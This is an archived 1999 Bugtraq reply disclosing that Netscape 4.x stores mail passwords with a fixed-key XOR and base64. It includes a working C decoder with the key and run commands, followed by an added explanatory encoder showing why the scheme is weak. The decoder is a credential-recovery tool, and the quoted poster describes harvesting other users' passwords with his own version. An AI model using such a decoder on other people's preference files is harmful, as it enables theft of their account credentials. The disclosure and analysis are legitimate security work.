[10168] in bugtraq
Re: Netscape 4.5 vulnerability
daemon@ATHENA.MIT.EDU (Wojtek Kaniewski)
Fri Apr 9 21:43:58 1999
Date: Thu, 8 Apr 1999 23:35:58 +0200
Reply-To: Wojtek Kaniewski <wojtekka@BYDNET.COM.PL>
From: Wojtek Kaniewski <wojtekka@BYDNET.COM.PL>
To: BUGTRAQ@NETSPACE.ORG

Alexey Pavlov wrote:

> I found a method to get users' passwords from the Netscape 4.5 for
> FreeBSD ~user/.netscape/liprefs.js file. This file is used for
> storing the user's last session preferences. This file also contains
> the encrypted password for pop3.

This method was found months ago.

> Unlike DES, this encryption can be decrypted. As a result of
> many experiments I wrote this program. It gives me almost all
> passwords in my system, because all people use Netscape.
> Here is the src of this decryption program:
> (snip)

Fascinating way to decrypt "xored" password :) Here's my little
decoder that I wrote in April 1998 for Netscape 4.0x.

-----cut here-----
/* (c) 1998 by wojtek kaniewski (wojtekka@dione.ids.pl) */
#include <stdio.h>

char base64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* unsigned: several key bytes are above 127 */
unsigned char key[] =
    { 86, 201, 239, 74, 155, 190, 90, 66, 119, 2, 67, 24, 112, 48, 139,
      76, 176, 42, 214, 79, 149, 141, 250, 247, 87, 123, 152, 9, 67,
      93, 1, 10 };

int main(int argc, char **argv) {
    int d = 0, m = 7, b, i = 0, c;
    char *p = (argc > 1) ? argv[1] : "";

    /* walk the base64 text up to the '=' padding; stop once the key is used up */
    for (; *p && *p != '=' && i < (int)sizeof(key); p++) {
        /* c = 6-bit value of this base64 character */
        for (c = 0; c < 64 && *p != base64[c]; c++);
        /* shift the 6 bits into d, most significant bit first */
        for (b = 5; b > -1; b--, m--) {
            d |= ((c & (1 << b)) >> b) << m;
            if (!m) {
                /* a full byte is assembled: undo the XOR and print it */
                printf("%c", d ^ key[i++]);
                d = 0;
                m = 8;
            }
        }
    }
    printf("\n");
    return 0;
}
-----cut here-----

$ gcc decode.c -o decode
$ ./decode <encrypted-password-here>

And no, it _won't_ get the encrypted password from the preferences file for you.

--
wojtekka@irc.pl :: http://wojtekka.stone.pl/ :: ^wojtekka@irc
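
Added example, not part of the original message or of Netscape's code: the encoding direction implied by the decoder above (XOR with the fixed key, then base64), showing why this storage gives no confidentiality. The output depends only on the password, so identical passwords are stored identically for every user and near-identical passwords share a visible prefix. The function names and sample passwords are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

static const char B64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
/* Fixed key, copied from the decoder in the message above. */
static const unsigned char KEY[32] = {
    86, 201, 239, 74, 155, 190, 90, 66, 119, 2, 67, 24, 112, 48, 139, 76,
    176, 42, 214, 79, 149, 141, 250, 247, 87, 123, 152, 9, 67, 93, 1, 10 };
static char demo[48];   /* scratch buffer for main() */

/* Hypothetical encoder: XOR each byte with KEY, then base64.
 * Returns 0, or -1 if pw is longer than KEY or out is too small. */
int obfuscate(const char *pw, char *out, size_t outlen)
{
    size_t n = strlen(pw), i, k, o = 0;
    if (n > sizeof KEY || outlen < 4 * ((n + 2) / 3) + 1) return -1;
    for (i = 0; i < n; i += 3) {
        unsigned char x[3] = { 0, 0, 0 };
        size_t left = n - i < 3 ? n - i : 3;
        for (k = 0; k < left; k++)
            x[k] = (unsigned char)(pw[i + k] ^ KEY[i + k]);
        out[o++] = B64[x[0] >> 2];
        out[o++] = B64[((x[0] & 3) << 4) | (x[1] >> 4)];
        out[o++] = left > 1 ? B64[((x[1] & 15) << 2) | (x[2] >> 6)] : '=';
        out[o++] = left > 2 ? B64[x[2] & 63] : '=';
    }
    out[o] = '\0';
    return 0;
}

/* Leading stored characters two passwords have in common (-1 on error). */
int shared_prefix(const char *a, const char *b)
{
    char ea[48], eb[48];
    int n = 0;
    if (obfuscate(a, ea, sizeof ea) || obfuscate(b, eb, sizeof eb)) return -1;
    while (ea[n] && ea[n] == eb[n]) n++;
    return n;
}

int main(void)
{
    /* Constructed sample passwords, not taken from any real file. */
    if (obfuscate("winter98", demo, sizeof demo) == 0) puts(demo);
    printf("shared prefix: %d\n", shared_prefix("winter98", "winter99"));
    return 0;
}
```

Because there is no per-user secret or salt, the only protection left for the stored value is the file permissions on the preferences file itself.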